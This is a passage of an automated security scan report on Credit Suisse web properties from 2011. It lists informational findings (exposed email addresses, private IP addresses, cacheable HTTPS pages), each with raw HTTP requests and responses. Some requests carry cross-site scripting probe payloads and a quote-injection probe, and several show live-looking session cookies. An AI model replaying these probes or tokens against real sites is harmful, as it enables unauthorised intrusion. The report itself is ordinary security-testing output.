<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.7. https://infocus.credit-suisse.com/app/rss/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:38 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.8. https://infocus.credit-suisse.com/app/sendpage/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.9. https://infocus.credit-suisse.com/app/shop/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/shop/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/shop/index.cfm HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:49 GMT
Server: Apache
Set-Cookie: CFID=38647286; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=9932378849fbeda01587b81cbfc3d766; HttpOnly;domain=.credit-suisse.com;Secure;path=/
expires: {ts '2011-09-19 16:39:49'}
Content-Language: en-US
cache-control: public, no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.10. https://infocus.credit-suisse.com/app/topic/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/topic/index.cfm?fuseaction=OpenTopic&coid=282917&lang=en HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:52 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:53 GMT
expires: Mon, 19 Sep 2011 15:46:53 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.11. https://infocus.credit-suisse.com/data/rss/120658/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/120658/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/120658/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:08:34 GMT
ETag: "1000000012795-ad36-4ad495d2d0cf0"
Accept-Ranges: bytes
Content-Length: 44342
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Sports]]></title>
<link>https://infocus.credit-suisse.com</link
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...

7.12. https://infocus.credit-suisse.com/data/rss/120659/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/120659/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/120659/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:07:23 GMT
ETag: "100000001279e-b4c3-4ad4958f7eec0"
Accept-Ranges: bytes
Content-Length: 46275
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Culture]]></title>
<link>https://infocus.credit-suisse.com</lin
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...

7.13. https://infocus.credit-suisse.com/data/rss/129126/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/129126/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/129126/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:36 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:05:54 GMT
ETag: "10000000127cb-ba9f-4ad4953a97470"
Accept-Ranges: bytes
Content-Length: 47775
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Economy & Finance]]></title>
<link>https://infocus.credit-suiss
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...

7.14. https://infocus.credit-suisse.com/data/rss/172769/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/172769/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/172769/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:36 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 13:00:26 GMT
ETag: "10000000127e6-b69d-4ad4aed42b4b0"
Accept-Ranges: bytes
Content-Length: 46749
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - In Focus]]></title>
<link>https://infocus.credit-suisse.com</li
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...

7.15. https://infocus.credit-suisse.com/data/rss/178706/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/178706/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/178706/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/rss/
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:08:26 GMT
ETag: "10000000127f8-b4f8-4ad3bf379cdf0"
Accept-Ranges: bytes
Content-Length: 46328
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Society]]></title>
<link>https://infocus.credit-suisse.com</lin
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...

7.16. https://infocus.credit-suisse.com/data/rss/188462/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/188462/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/188462/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:53 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 11:01:10 GMT
ETag: "100000001280f-d9ea-4ad4942b58ff0"
Accept-Ranges: bytes
Content-Length: 55786
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Economy & Busi
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...
<itunes:email>emagazine.feedback@credit-suisse.com</itunes:email>
...[SNIP]...

7.17. https://infocus.credit-suisse.com/data/rss/221715/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/221715/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/221715/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:54 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:03:20 GMT
ETag: "1000000012845-4ff2-4ad3be141f180"
Accept-Ranges: bytes
Content-Length: 20466
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Credit Suisse - Global Investo
...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...
<itunes:email>emagazine.feedback@credit-suisse.com</itunes:email>
...[SNIP]...

7.18. https://infocus.credit-suisse.com/data/rss/282908/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/282908/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/282908/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:53 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:01:33 GMT
ETag: "1000000012853-cfc8-4ad3bdada94f0"
Accept-Ranges: bytes
Content-Length: 53192
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Credit Suisse TV]]></title>

...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...
<itunes:email>emagazine.feedback@credit-suisse.com</itunes:email>
...[SNIP]...

7.19. https://infocus.credit-suisse.com/data/rss/285457/EN/index.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /data/rss/285457/EN/index.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /data/rss/285457/EN/index.xml HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:54 GMT
Server: Apache
Last-Modified: Sun, 18 Sep 2011 19:00:45 GMT
ETag: "100000001289b-4444-4ad3bd7fe9e20"
Accept-Ranges: bytes
Content-Length: 17476
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>


   <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">


<channel>
<title><![CDATA[Our Commitment]]></title>

...[SNIP]...
<managingEditor>emagazine.feedback@credit-suisse.com (Credit Suisse, Corporate Communications)</managingEditor>
...[SNIP]...
<webMaster>admin@jamez.ch (Jamez Webmaster)</webMaster>
...[SNIP]...
<itunes:email>emagazine.feedback@credit-suisse.com</itunes:email>
...[SNIP]...

7.20. https://infocus.credit-suisse.com/jamez_customtags/control/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /jamez_customtags/control/functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jamez_customtags/control/functions.js HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:35:36 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 10:49:30 GMT
ETag: "10000000279fe-bcf-480e33ca8a6e3"
Accept-Ranges: bytes
Content-Length: 3023
Connection: close
Content-Type: application/javascript

/* ************************************************************ */
/* Javascript */
/* ************************************************************
...[SNIP]...
*/
/* version : 1.0 */
/* created at : 26.04.03 */
/* created by : altug salini as@absolute.ch */
/* ************************************************************ */

/* %%%%%%%%%%%% CONTROL FUNCTIONS %%%%%%%%%%% */

/* opwn update window */
var updateText=0;
function edit(t
...[SNIP]...

7.21. https://responsibility.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:21 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...
<a href="mailto:emagazine.feedback@credit-suisse.com" title="Mail : emagazine.feedback@credit-suisse.com">
...[SNIP]...
<a class="arrowListContact" title="Contact point for Corporate Citizenship" target="_self" href="mailto:responsibility.corporate@credit-suisse.com">
...[SNIP]...

7.22. https://responsibility.credit-suisse.com/jamez_customtags/control/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /jamez_customtags/control/functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jamez_customtags/control/functions.js HTTP/1.1
Host: responsibility.credit-suisse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Accept: */*
Referer: https://responsibility.credit-suisse.com/app/error/?b3d39%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E1dcfbcc5044=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CsgBasePath=/us/; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482677424:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.1 200 OK
Date: Mon, 19 Sep 2011 14:37:22 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 10:49:30 GMT
ETag: "10000000279fe-bcf-480e33ca8a6e3"
Accept-Ranges: bytes
Content-Length: 3023
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* ************************************************************ */
/* Javascript */
/* ************************************************************
...[SNIP]...
*/
/* version : 1.0 */
/* created at : 26.04.03 */
/* created by : altug salini as@absolute.ch */
/* ************************************************************ */

/* %%%%%%%%%%%% CONTROL FUNCTIONS %%%%%%%%%%% */

/* opwn update window */
var updateText=0;
function edit(t
...[SNIP]...

8. Private IP addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


8.1. https://emagazine.credit-suisse.com/app/home/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /app/home/index.cfm?8cac8%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ea9cebca0244=1 HTTP/1.1
Host: emagazine.credit-suisse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Accept: */*
Referer: https://emagazine.credit-suisse.com/app/home/index.cfm?8cac8%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ea9cebca0244=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CsgBasePath=/us/; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482677424:ss=1316482406749; CFID=38647896; CFTOKEN=27231980; bhCookieSess=1; bhCookiePerm=1

Response

HTTP/1.1 200 OK
Date: Mon, 19 Sep 2011 14:56:38 GMT
Server: Apache
Set-Cookie: CFID=38647896; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=27231980; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: bhCookieSess=1;path=/
Set-Cookie: bhCookiePerm=1;expires=Wed, 21-Sep-2011 14:56:38 GMT;path=/
Pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:56:38 GMT
expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32002

<HTML><HEAD>
<!-- These scripts are provided under the terms of the BrowserHawk license
agreement and may not be copied or used otherwise. [10.0.1.1 Enterprise; BDD ver 10.00]
See cyscape.com for details.
Copyright (C) 1999-2006 cyScape, Inc. All rights reserved.
-->
...[SNIP]...

8.2. https://infocus.credit-suisse.com/app/_gen/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_gen/index.cfm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /app/_gen/index.cfm?cmd=display&folder=%27 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:39:22 GMT
Server: Apache
Set-Cookie: CFID=38647283; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=52167621; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: bhCookieSess=1;path=/
Set-Cookie: bhCookiePerm=1;expires=Wed, 21-Sep-2011 14:39:23 GMT;path=/
Pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:39:22 GMT
expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html

<HTML xmlns:BHAWK><HEAD><STYLE>@media all { BHAWK\:clientCaps {behavior:url(#default#clientcaps)} }</STYLE>
<!-- These scripts are provided under the terms of the BrowserHawk license
agreement and may not be copied or used otherwise. [10.0.1.1 Enterprise; BDD ver 10.00]
See cyscape.com for details.
Copyright (C) 1999-2006 cyScape, Inc. All rights reserved.
-->
...[SNIP]...

9. Cacheable HTTPS response  previous  next
There are 36 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


9.1. https://emagazine.credit-suisse.com/app/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/

Request

GET /app/home/ HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:30 GMT
expires: Mon, 19 Sep 2011 15:46:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...

9.2. https://emagazine.credit-suisse.com/app/home/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Request

GET /app/home/index.cfm HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:29 GMT
expires: Mon, 19 Sep 2011 15:46:29 GMT
